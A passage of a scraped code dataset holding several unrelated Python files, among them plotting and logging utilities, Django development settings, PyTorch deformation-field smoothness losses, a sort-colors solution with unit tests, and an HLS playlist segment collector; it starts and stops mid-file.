file_name=None,):\n multiple_key_value = {}\n for i in range(self.num):\n log_name = os.path.join(self._root_dir, 'exp_' + str(i), 'record', sub_log_dir_name, 'log.json')\n f = open(log_name, 'r')\n res_dict = json.load(f)\n key_list = res_dict[key]\n key_vector = []\n index_vector = []\n for record in key_list:\n num_index = int(record[index])\n index_vector.append(num_index)\n key_vector.append(record[\"log_val\"])\n multiple_key_value[index] = index_vector\n multiple_key_value[key + '_' + str(i)] = key_vector\n\n data = pd.DataFrame.from_dict(multiple_key_value) # Create dataframe for plotting\n row_num = data.shape[0]\n column_num = data.shape[1]\n data_new = data\n\n # Calculate mean value in horizontal axis, incompatible with histogram mode\n if average_over != 1:\n if mode != 'histogram':\n new_row_num = int(row_num / average_over)\n data_new = data.head(new_row_num).copy()\n data_new.loc[:, index] = data_new.loc[:, index] * average_over\n for column in range(1, column_num):\n for i in range(new_row_num):\n data_new.iloc[i, column] = data.iloc[i * average_over: i * average_over + average_over,\n column].mean()\n\n data_new['MEAN'] = data_new[data_new.columns[1:]].mean(axis=1) # axis = 1 in columns, first column not counted\n data_new['STD_DEV'] = data_new[data_new.columns[1:-1]].std(axis=1)\n\n if mode == 'histogram':\n histogram_flag = True\n data_new = data.iloc[:, 1:-2].copy().stack() # Mean and variance columns not counted\n else:\n histogram_flag = False\n if mode == 'scatter':\n scatter_flag = True\n else:\n scatter_flag = False\n\n Plotter.plot_any_key_in_log(data=data_new, index=index, key=key, exp_num=self.num,\n scatter_flag=scatter_flag, save_flag=True,\n mean_stddev_flag=True,\n histogram_flag=histogram_flag, save_path=os.path.join(self._root_dir),\n sub_log_dir_name=sub_log_dir_name, save_format=save_format, 
file_name=file_name)\n","sub_path":"baconian/common/log_data_loader.py","file_name":"log_data_loader.py","file_ext":"py","file_size_in_byte":6349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544127878","text":"import pandas as pd\n\nreps = 10\nsource = \"final_test/result5/result_system/\"\ndest = source + \"result_mal_evol.csv\"\n\n\ndef get_value(filename):\n malleable = open(filename, \"r\")\n lines = malleable.readlines()\n wait_time = float(lines[0])\n turn_around_time = float(lines[1])\n utilization = float(lines[3])\n exe = float(lines[4])\n return wait_time, turn_around_time/1000, utilization, exe\n\n\ndef main():\n df = pd.DataFrame(\n columns=['adp_res', 'adp_turn', 'adp_util', 'adp_exe', 'exp_res', 'exp_turn', 'exp_util', 'exp_exe', 'gain_res', 'gain_turn',\n 'gain_util', 'gain_exe', 'resr_res', 'resr_turn', 'resr_util', 'resr_exe',\n 'time_res', 'time_turn', 'time_util', 'time_exe', 'reps', 'perc'])\n for i in range(10, 110, 10):\n for j in range(1, reps + 1, 1):\n fileadp = source + \"adaptation/mal_evol/\" + \"average_mal_evol\" + str(i) + str(j) + \".txt\"\n fileexp = source + \"expansion/mal_evol/\" + \"average_mal_evol\" + str(i) + str(j) + \".txt\"\n filegain = source + \"gain/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n fileres = source + \"resources/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n filetime = source + \"time/mal_evol/\" + \"average_mal_evol\" + str(i) + str(\n j) + \".txt\"\n adp_res, adp_turn, adp_util, adp_exe = get_value(fileadp)\n exp_res, exp_turn, exp_util, exp_exe = get_value(fileexp)\n gain_res, gain_turn, gain_util, gain_exe = get_value(filegain)\n resr_res, resr_turn, resr_util, resr_exe = get_value(fileres)\n time_res, time_turn, time_util, time_exe = get_value(filetime)\n df = df.append({'adp_res': adp_res, 'adp_turn': adp_turn, 'adp_util': adp_util, 'adp_exe': adp_exe, 'exp_res': exp_res,\n 'exp_turn': exp_turn, 
'exp_util': exp_util, 'exp_exe': exp_exe,\n 'gain_res': gain_res, 'gain_turn': gain_turn, 'gain_util': gain_util, 'gain_exe': gain_exe, 'resr_res': resr_res,\n 'resr_turn': resr_turn, 'resr_util': resr_util, 'resr_exe': resr_exe,\n 'time_res': time_res, 'time_turn': time_turn, 'time_util': time_util, 'time_exe': time_exe, 'reps': j, 'perc': i},\n ignore_index=True)\n\n df.to_csv(dest)\n\nmain()","sub_path":"generate_reps_result.py","file_name":"generate_reps_result.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564140191","text":"import os\nimport os.path as osp\nimport sys\n\ndef get_dir(base_path):\n path = base_path\n ix = -1\n while osp.exists(path):\n ix += 1\n path = base_path + str(ix)\n\n print(osp.join(os.getcwd() + path))\n sys.stdout.flush()\n\n os.makedirs(path)\n return path\n\nclass FileWriter(object):\n def __init__(self, Dir, graph):\n self.f = {}\n self.dir = Dir\n\n if not osp.exists(Dir):\n os.makedirs(Dir)\n\n def add_summary(self, dict, i):\n for key in dict:\n if key not in self.f:\n self.f[key] = open(osp.join(self.dir, '{}.csv'.format(key)), 'w+t')\n\n self.f[key].write(str(i))\n self.f[key].write(',')\n self.f[key].write(str(dict[key]))\n self.f[key].write('\\n')\n self.f[key].flush()\n\n\n","sub_path":"util/logger_util.py","file_name":"logger_util.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465140565","text":"import numpy as np\nimport random as rnd\nimport constants as cst\nfrom tqdm import tqdm\n\nimport Results as rs\n\n\ndef add_to_hit(hits, revenue, ch, value, coef):\n hits[ch] += 1.0*coef\n revenue[ch] += value*coef\n\n\ndef init_dict(init):\n chan = range(len(cst.coupSubs))\n if init == 0:\n d = dict(map(lambda k: (k, 0), chan))\n else:\n d = dict(map(lambda k: (k, []), chan))\n return d\n\n\ndef full_stats_base(data):\n 
revenues = (np.zeros((len(cst.channels), len(cst.coupSubs))))\n hits = (np.zeros((len(cst.channels), len(cst.coupSubs)))) \n conversions = (np.zeros((len(cst.coupSubs))))\n conversions_ch = (np.zeros((len(cst.channels))))\n lengthdist = (np.zeros((len(cst.channels))))\n\n for row in tqdm.tqdm(data):\n spl_rev = np.array(map(float, row[3].split(','))) / 1000000\n subs = np.array(map(lambda x: int(float(x)), row[7].split(',')))\n spl_ch = np.array(map(float, row[2].split(',')))\n\n if (min(spl_ch) < 0) and sum(spl_rev) > 0:\n continue\n\n if min(spl_ch) < 0:\n continue\n\n if np.max(subs) > 20:\n continue\n\n for i in range(len(spl_rev)):\n revenues[int(spl_ch[i]), int(subs[i])] += spl_rev[i]\n hits[int(spl_ch[i]), int(subs[i])] += 1\n if spl_rev[i] > 0:\n conversions[int(subs[i])] += 1\n conversions_ch[int(spl_ch[i])] += 1\n\n if len(spl_rev) < 16:\n lengthdist[len(spl_rev)] += 1\n\n return revenues, hits, conversions, lengthdist\n \n\ndef full_stats(data, rtype):\n revenues = []\n full_revenue = 0\n spend = 0\n hits = 0\n conversions = 0\n length_dist = init_dict(0)\n\n for row in tqdm.tqdm(data.values):\n spl_rev = np.array(map(float, row[3].split(',')))/1000000\n spl_spd = np.array(map(float, row[6].split(',')))\n subs = np.max(map(lambda x: int(float(x)), row[7].split(',')))\n\n if np.sum(spl_rev) > 0 and rs.SubResults.CheckType(rtype, subs):\n\n revenues.append(np.sum(spl_rev))\n full_revenue += np.sum(spl_rev)\n\n conversions += len(spl_rev[spl_rev > 0])\n spend += np.sum(spl_spd)\n\n hits += len(spl_rev)\n if len(spl_rev) < 16:\n length_dist[len(spl_rev)] += 1\n\n return revenues, full_revenue, spend, hits, conversions, length_dist\n\n\ndef full_stats_monte(data, rtype):\n revenues = []\n length_dist = init_dict(0)\n full_revenue = 0\n spend = 0\n hits = 0\n conversions = 0\n\n iter = 0.0\n means = []\n amn = means.append\n\n rnd.shuffle(data.values)\n\n for row in tqdm.tqdm(data.values):\n spl_rev = np.array(map(float, row[3].split(',')))/1000000\n spl_spd = 
np.array(map(float, row[6].split(',')))\n subs = np.max(map(lambda x: int(float(x)), row[7].split(',')))\n\n if np.sum(spl_rev) > 0 and rs.SubResults.CheckType(rtype, subs):\n revenues.append(np.sum(spl_rev))\n full_revenue += np.sum(spl_rev)\n conversions += len(spl_rev[spl_rev > 0])\n spend += np.sum(spl_spd)\n hits += len(spl_rev)\n if len(spl_rev) < 16:\n length_dist[len(spl_rev)] += 1\n \n iter += 1\n\n if np.sum(spl_rev) > 0:\n amn(full_revenue/hits)\n if len(means) > 30 and iter > 10000 and np.std(means[-10:]) < 0.01:\n break\n\n coef = len(data.values) / iter\n\n return revenues, full_revenue*coef, spend*coef, hits*coef, conversions*coef, length_dist\n\n","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399306426","text":"# Vagrant development settings\n\nfrom .base import * # noqa\n\n\nREDIS = {\n 'host': 'localhost',\n 'port': 6379,\n 'db': 0,\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'docs',\n 'USER': 'docs',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nBROKER_URL = 'redis://localhost:6379/0'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/0'\nCELERY_ALWAYS_EAGER = False\n\nCACHES = {\n 'default': {\n 'BACKEND': 'redis_cache.RedisCache',\n 'LOCATION': 'localhost:6379',\n 'PREFIX': 'docs',\n 'OPTIONS': {\n 'DB': 1,\n 'CLIENT_CLASS': 'redis_cache.client.DefaultClient',\n },\n },\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cached_db\"\n\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTOCOL\", \"https\")\nSESSION_COOKIE_DOMAIN = 'localhost'\nSESSION_COOKIE_SECURE = False\nCSRF_COOKIE_DOMAIN = 'localhost'\nCSRF_COOKIE_SECURE = False\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nSLUMBER_USERNAME = 'test'\nSLUMBER_PASSWORD = 'test'\nSLUMBER_API_HOST = 'http://localhost:8000'\n\nWEBSOCKET_HOST = 
'localhost:8088'\n\nIMPORT_EXTERNAL_DATA = False\nDONT_HIT_DB = False\nPRODUCTION_DOMAIN = 'localhost'\nUSE_SUBDOMAIN = False\n","sub_path":"readthedocs/settings/vagrant.py","file_name":"vagrant.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191193800","text":"import torch\nfrom torch.autograd import Variable\n\n\ndef lap(fields, device='cuda'):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device=device))\n return torch.cat((p, f[:,1:-1,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device=device))\n return torch.cat((p, f[:,:,1:-1,:] - f[:,:,:-2,:], p), 2)\n def dxf(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device=device))\n return torch.cat((p, f[:,1:-1,:,:] - f[:,2:,:,:], p), 1)\n def dyf(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device=device))\n return torch.cat((p, f[:,:,1:-1,:] - f[:,:,2:,:], p), 2)\n fields = map(lambda f: [dx(f), dy(f), dxf(f), dyf(f)], fields)\n fields = map(lambda fl: (sum(fl) / 4.0) ** 2, fields)\n field = sum(map(lambda f: torch.sum(f, -1), fields))\n return field\n\ndef jacob(fields):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n return torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n return torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.cat(fields, -1) ** 2, -1)\n return field\n\ndef cjacob(fields):\n def center(f):\n fmean_x, fmean_y = torch.mean(f[:,:,:,0]).item(), torch.mean(f[:,:,:,1]).item()\n fmean = torch.cat((fmean_x * torch.ones((1,f.size(1), f.size(2),1), device='cuda'), fmean_y * torch.ones((1,f.size(1), f.size(2),1), device='cuda')), 3)\n fmean = Variable(fmean).cuda()\n return f - fmean\n\n def dx(f):\n p = 
Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n d = torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n return center(d)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n d = torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n return center(d)\n\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.cat(fields, -1) ** 2, -1)\n return field\n\ndef tv(fields):\n def dx(f):\n p = Variable(torch.zeros((f.size(0),1,f.size(1),2), device='cuda'))\n return torch.cat((p, f[:,2:,:,:] - f[:,:-2,:,:], p), 1)\n def dy(f):\n p = Variable(torch.zeros((f.size(0),f.size(1),1,2), device='cuda'))\n return torch.cat((p, f[:,:,2:,:] - f[:,:,:-2,:], p), 2)\n fields = sum(map(lambda f: [dx(f), dy(f)], fields), [])\n field = torch.sum(torch.abs(torch.cat(fields, -1)), -1)\n return field\n\n\ndef field_dx(f, forward=False):\n if forward:\n delta = f[:, 1:-1, :, :] - f[:, 2:, :, :]\n else:\n delta = f[:, 1:-1, :, :] - f[:, :-2, :, :]\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 0, 0, 1, 1, 0, 0))\n return result\n\n\ndef field_dy(f, forward=False):\n if forward:\n delta = f[:, :, 1:-1, :] - f[:, :, 2:, :]\n else:\n delta = f[:, :, 1:-1, :] - f[:, :, :-2, :]\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 0, 0, 0, 0))\n return result\n\n\ndef field_dxy(f, forward=False):\n if forward:\n delta = f[:, 1:-1, 1:-1, :] - f[:, 2:, 2:, :]\n else:\n delta = f[:, 1:-1, 1:-1, :] - f[:, :-2, :-2, :]\n\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 1, 1, 0, 0))\n return result\n\n\ndef field_dxy2(f, forward=False):\n if forward:\n delta = f[:, 1:-1, 1:-1, :] - f[:, 2:, :-2, :]\n else:\n delta = f[:, 1:-1, 1:-1, :] - f[:, :-2, 2:, :]\n\n result = delta\n result = torch.nn.functional.pad(delta, pad=(0, 0, 1, 1, 1, 1, 0, 0))\n return result\n\n\ndef rigidity_score(field_delta, tgt_length, power=2):\n spring_lengths = torch.sqrt(field_delta[..., 0] 
** 2 + field_delta[..., 1] ** 2)\n spring_deformations = (spring_lengths - tgt_length).abs() ** power\n return spring_deformations\n\n\ndef pix_identity(size, batch=1, device=\"cuda\"):\n result = torch.zeros((batch, size, size, 2), device=device)\n x = torch.arange(size, device=device)\n result[:, :, :, 1] = x\n result = torch.transpose(result, 1, 2)\n result[:, :, :, 0] = x\n result = torch.transpose(result, 1, 2)\n return result\n\n\ndef rigidity(field, power=2):\n identity = pix_identity(size=field.shape[-2])\n field_abs = field + identity\n\n result = rigidity_score(field_dx(field_abs, forward=False), 1, power=power)\n result += rigidity_score(field_dx(field_abs, forward=True), 1, power=power)\n result += rigidity_score(field_dy(field_abs, forward=False), 1, power=power)\n result += rigidity_score(field_dy(field_abs, forward=True), 1, power=power)\n result += rigidity_score(\n field_dxy(field_abs, forward=True), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy(field_abs, forward=False), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy2(field_abs, forward=True), 2 ** (1 / 2), power=power\n )\n result += rigidity_score(\n field_dxy2(field_abs, forward=False), 2 ** (1 / 2), power=power\n )\n result /= 8\n\n # compensate for padding\n result[..., 0:6, :] = 0\n result[..., -6:, :] = 0\n result[..., :, 0:6] = 0\n result[..., :, -6:] = 0\n\n return result.squeeze()\n\n\ndef smoothness_penalty(ptype):\n def penalty(fields, weights=None):\n if ptype == \"lap\":\n field = lap(fields)\n elif ptype == \"jacob\":\n field = jacob(fields)\n elif ptype == \"cjacob\":\n field = cjacob(fields)\n elif ptype == \"tv\":\n field = tv(fields)\n elif ptype == \"rig\":\n field = rigidity(fields[0])\n elif ptype == \"linrig\":\n field = rigidity(fields[0], power=1)\n elif ptype == \"rig1.5\":\n field = rigidity(fields[0], power=1.5)\n elif ptype == \"rig3\":\n field = rigidity(fields[0], power=3)\n else:\n raise ValueError(\"Invalid penalty 
type: {}\".format(ptype))\n\n if weights is not None:\n field = field * weights\n return field\n return penalty\n\ndef similarity_score(should_reduce=False):\n return lambda x, y: torch.mean((x-y)**2) if should_reduce else (x-y)**2\n","sub_path":"training/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527681446","text":"import seaborn as sn\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom io import StringIO\nimport sys\nfrom keras.backend import eval\n\ntheme = 'dark'\nmpl.rcParams[\"savefig.dpi\"] = 300\n\ndef changeTheme(newTheme):\n\tglobal theme\n\t\n\ttheme = newTheme\n\tsetTheme()\n\ndef setTheme():\n\tif theme == 'dark':\n\t\ttextColor = 'white'\n\t\tbackgroundColor = '#232323'\n\telse:\n\t\ttextColor = 'black'\n\t\tbackgroundColor = 'white'\n\n\tfor param in ['text.color', 'axes.labelcolor', 'xtick.color', 'ytick.color']:\n\t\tmpl.rcParams[param] = textColor\n\tmpl.rcParams['axes.facecolor'] = backgroundColor\n\n\ndef plotAverageClassifierAccuracy(histories):\n\tsetTheme()\n\taccuracy = getAvgClassifierAccuracy(histories)\n\tplt.axis('off')\n\tplt.text(0,1,f\"%.2f%%\" % accuracy, fontsize=22)\n\tplt.text(0,0,f\"Average accuracy\")\n\ndef plotNetworkLoss(histories):\n\tsetTheme()\n#\tplt.title(\"train vs validation loss\")\n\tminEpochNum = min([len(history['acc']) for history in histories])\n\tfor history in histories:\n\t\tplt.plot(history[\"loss\"], color=\"blue\", label=\"train\", alpha=0.2)\n\t\tplt.plot(history[\"val_loss\"], color=\"orange\", label=\"validation\", alpha=0.2)\n\t\tplt.plot(np.array([history['loss'][:minEpochNum] for history in histories]).mean(axis=0), color=\"blue\", label=\"train\")\n\t\tplt.plot(np.array([history['val_loss'][:minEpochNum] for history in histories]).mean(axis=0), color=\"orange\", 
label=\"validation\")\n\tplt.ylabel(\"loss\")\n\tplt.xlabel(\"epoch\")\n\ndef plotNetworkAccuracy(histories):\n\tsetTheme()\n#\tplt.title(\"train vs validation accuracy\")\n\tminEpochNum = min([len(history['acc']) for history in histories])\n\tfor history in histories:\n\t\tplt.plot(history[\"acc\"], color=\"blue\", label=\"train\", alpha=0.2)\n\t\tplt.plot(history[\"val_acc\"], color=\"orange\", label=\"validation\", alpha=0.2)\n\t\tplt.plot(np.array([history['acc'][:minEpochNum] for history in histories]).mean(axis=0), color=\"blue\", label=\"train\")\n\t\tplt.plot(np.array([history['val_acc'][:minEpochNum] for history in histories]).mean(axis=0), color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"accuracy\")\n\tplt.xlabel(\"epoch\")\n\ndef plotAverageConfusionMatrix(histories):\n\tsetTheme()\n#\tplt.title(\"avg confusion matrix\")\n\tmeanConfusionMatrix = [\n\t\t[int(np.mean([history['confusionMatrix'][0][0] for history in histories])),\n\t\t int(np.mean([history['confusionMatrix'][0][1] for history in histories]))],\n\t\t[int(np.mean([history['confusionMatrix'][1][0] for history in histories])),\n\t\t int(np.mean([history['confusionMatrix'][1][1] for history in histories]))]\n\t]\n\tdf_cm = pd.DataFrame(meanConfusionMatrix, index = ['therapeutic', 'inducing'],\n\t\t\t\t\t columns = ['therapeutic', 'inducing'])\n\tplt.ylabel(\"predictions\")\n\tplt.xlabel(\"labels\")\n\tsn.heatmap(df_cm, annot=True, fmt='d')\n\ndef plotNetworkMetrics(histories):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0,1.0,f\"%.2f%%\" % (getAvgMaxNetworkAccuracy(histories)),\n\t\t\tfontsize=22)\n\tplt.text(0,0.95,f\"avg max validation accuracy\")\n\ndef plotClassifierMetrics(histories):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0,1.0,f\"%.2f%%\" % (getAvgClassifierAccuracy(histories)),\n\t\t\t fontsize=22)\n\tplt.text(0,0.95,f\"avg validation accuracy\")\n\ndef getAvgClassifierAccuracy(histories):\n\treturn np.mean([history['accuracy'] for history in histories]) * 100\n\ndef 
getAvgMaxNetworkAccuracy(histories):\n\treturn np.array([max(history['val_acc']) for history in histories]).mean(axis=0) * 100\n\ndef plotNetworkAttributes(model):\n\tsetTheme()\n\tplt.axis('off')\n\tplt.text(0, .8, f'Learning rate: {eval(model.optimizer.lr)}', fontsize=12)\n\ndef analyzeNetwork(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkMetrics(histories)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkLoss(histories)\n\tplt.subplot(1,2,2)\n\tplotNetworkAccuracy(histories)\n\tplt.show()\n\ndef analyzeClassifier(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\t\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotClassifierMetrics(histories)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories)\n\tplt.show()\n\ndef analyzePredictionModels(title, histories):\n\tsetTheme()\n\tplt.figure(figsize=(18,0.2))\n\tplt.axis('off')\n\tplt.text(0,.7, title, fontsize=30)\n\tplt.show()\n\t\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplt.text(0,0.2,f\"%.2f%%\" % (getAvgMaxNetworkAccuracy(histories)),\n\t\t\t fontsize=22)\n\tplt.text(0,0,f\"avg max validation accuracy\")\n\tplt.show()\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplt.title(\"train vs validation loss\")\n\tfor history in histories:\n\t\tplt.plot(history[\"loss\"], color=\"blue\", label=\"train\")\n\t\tplt.plot(history[\"val_loss\"], color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"loss\")\n\tplt.xlabel(\"epoch\")\n\tplt.subplot(1,2,2)\n\tplt.title(\"train vs validation accuracy\")\n\tfor history in histories:\n\t\tplt.plot(history[\"acc\"], color=\"blue\", 
label=\"train\")\n\t\tplt.plot(history[\"val_acc\"], color=\"orange\", label=\"validation\")\n\tplt.ylabel(\"accuracy\")\n\tplt.xlabel(\"epoch\")\n\tplt.show()\n\ndef compareModels(title, metric, values, accuracies):\n\tsetTheme()\n\tplt.figure(figsize=(18,1.5))\n\tplt.axis('off')\n\tplt.text(0,1, title, fontsize=26)\n\n\tplt.text(0,0.4, metric, fontsize=18)\n\tfor i in range(len(values)):\n\t\tplt.text(0.1 * (i+1),0.4, values[i], fontsize=18)\n\n\tplt.text(0,0,\"accuracy\", fontsize=18)\n\tfor i in range(len(values)):\n\t\tplt.text(0.1 * (i+1),0, \"%.2f\" % (accuracies[i]), fontsize=18)\n\n\tplt.show()\n\ndef compareNetworks(titel1, titel2, histories1, histories2, model1=None, model2=None):\n\tsetTheme()\n\tfig = plt.figure(figsize=(16,.5))\n\tplt.axis('off')\n\tplt.text(0, 0, titel1, fontsize=30)\n\tplt.text(.5, 0, titel2, fontsize=30)\n\tplt.show()\n\n\n\tif model1 is not None and model2 is not None:\n\t\told_stdout = sys.stdout\n\t\tmodel1Output = StringIO()\n\t\tsys.stdout = model1Output\n\t\tprint(model1.summary())\n\t\tmodel2Output = StringIO()\n\t\tsys.stdout = model2Output\n\t\tprint(model2.summary())\n\t\tsys.stdout = old_stdout\n\t\tmodel1Summary = model1Output.getvalue().replace('=', '')\n\t\tmodel2Summary = model2Output.getvalue().replace('=', '')\n\n\t\tfig = plt.figure(figsize=(16,3))\n\t\tplt.axis('off')\n\t\tplt.text(0, 0, model1Summary, fontsize=12)\n\t\tplt.text(.5, 0, model2Summary, fontsize=12)\n\t\tplt.show()\n\n\t\tfig = plt.figure(figsize=(16, .5))\n\t\tplt.subplot(1,2,1)\n\t\tplotNetworkAttributes(model1)\n\t\tplt.subplot(1,2,2)\n\t\tplotNetworkAttributes(model2)\n\t\tplt.show()\n\n\tfig = plt.figure(figsize=(16, 1))\n\tplt.subplot(1,2,1)\n\tplotNetworkMetrics(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkMetrics(histories2)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkLoss(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkLoss(histories2)\n\tplt.show()\n\n\tfig = 
plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotNetworkAccuracy(histories1)\n\tplt.subplot(1,2,2)\n\tplotNetworkAccuracy(histories2)\n\tplt.show()\n\n\tfig = plt.figure(figsize=(16,5))\n\tplt.subplot(1,2,1)\n\tplotAverageConfusionMatrix(histories1)\n\tplt.subplot(1,2,2)\n\tplotAverageConfusionMatrix(histories2)\n\tplt.show()\n","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"546646977","text":"import unittest\n\n\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n if not nums:\n return\n\n n = len(nums)\n\n # for every i < left, nums[i] == 0\n left = 0\n while left < n and nums[left] == 0:\n left += 1\n\n # for every i > right, nums[i] == 2\n right = n - 1\n while right >= 0 and nums[right] == 2:\n right -= 1\n\n # for every left <= i < mid, nums[i] == 1\n mid = left\n while mid <= right:\n if nums[mid] == 0:\n nums[mid], nums[left] = nums[left], nums[mid]\n left += 1\n elif nums[mid] == 2:\n if nums[right] == 1:\n nums[mid], nums[right] = nums[right], nums[mid]\n else:\n nums[mid], nums[right] = nums[right], nums[mid]\n nums[mid], nums[left] = nums[left], nums[mid]\n left += 1\n while True:\n right -= 1\n if right == mid or nums[right] != 2:\n break\n mid += 1\n\n\nclass Test(unittest.TestCase):\n def test(self):\n self._test([], [])\n self._test([0], [0])\n self._test([2, 0, 1], [0, 1, 2])\n self._test([2, 0], [0, 2])\n self._test([1, 2, 0, 0], [0, 0, 1, 2])\n self._test([1, 2, 0], [0, 1, 2])\n self._test([2, 1, 0, 1], [0, 1, 1, 2])\n\n def _test(self, nums, expected):\n Solution().sortColors(nums)\n self.assertEqual(nums, expected)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"p075_threesort.py","file_name":"p075_threesort.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35700415","text":"import datetime\r\n\r\nimport m3u8\r\n\r\nimport src.formulator\r\nimport src.stream_receiving\r\nfrom src.data_models import TsSegment\r\n\r\n\r\nclass PowernetFormulator(src.formulator.M3u8Formulator):\r\n\r\n def __init__(self, config: src.stream_receiving.M3u8Watcher.Config):\r\n self.m3u8_url = config.m3u8_url\r\n self.ts_base_url = config.ts_base_url\r\n self.name = config.non_null_name()\r\n self.tag = \"PowernetFormulator@\" + str(self.name)\r\n self.timezone_fix = config.timezone_h_fix\r\n\r\n __ad_met__ = False\r\n\r\n def update_queue(self):\r\n playlist = m3u8.load(self.m3u8_url)\r\n for s in playlist.segments:\r\n try:\r\n start_time = self.__parse_time__(s.uri)\r\n dur = s.duration\r\n uri = self.ts_base_url + str(s.uri)\r\n ts_segment = TsSegment(\r\n uri=uri,\r\n duration=dur,\r\n start_time=start_time,\r\n type_=TsSegment.TYPE_TS_CONTENT\r\n )\r\n self.__add_if_needed__(ts_segment)\r\n\r\n except ValueError:\r\n # Эта ветка сработает, если Powernet отправил рекламный ts\r\n ts_segment = TsSegment(\r\n uri=None,\r\n duration=0,\r\n start_time=None,\r\n type_=TsSegment.TYPE_TS_AD\r\n )\r\n\r\n # Если реклама встречается только единожды, при первом подключении, то эта условная ветка будет работать\r\n # корректно -- добавлять только первое упоминание рекламного сегмента, а остальные игнорировать.\r\n # Если же реклама может встретиться ещё когда-то, помимо первого подключения, то данный условный блок\r\n # нужно будет переработать\r\n if not self.__ad_met__:\r\n self.queue.put(ts_segment)\r\n self.__ad_met__ = True\r\n\r\n #\r\n # Конец публичной зоны\r\n #\r\n\r\n __last_start_time__ = None\r\n __tolerance__ = 0.08\r\n\r\n def __add_if_needed__(self, ts_segment):\r\n if self.__last_start_time__ is None \\\r\n 
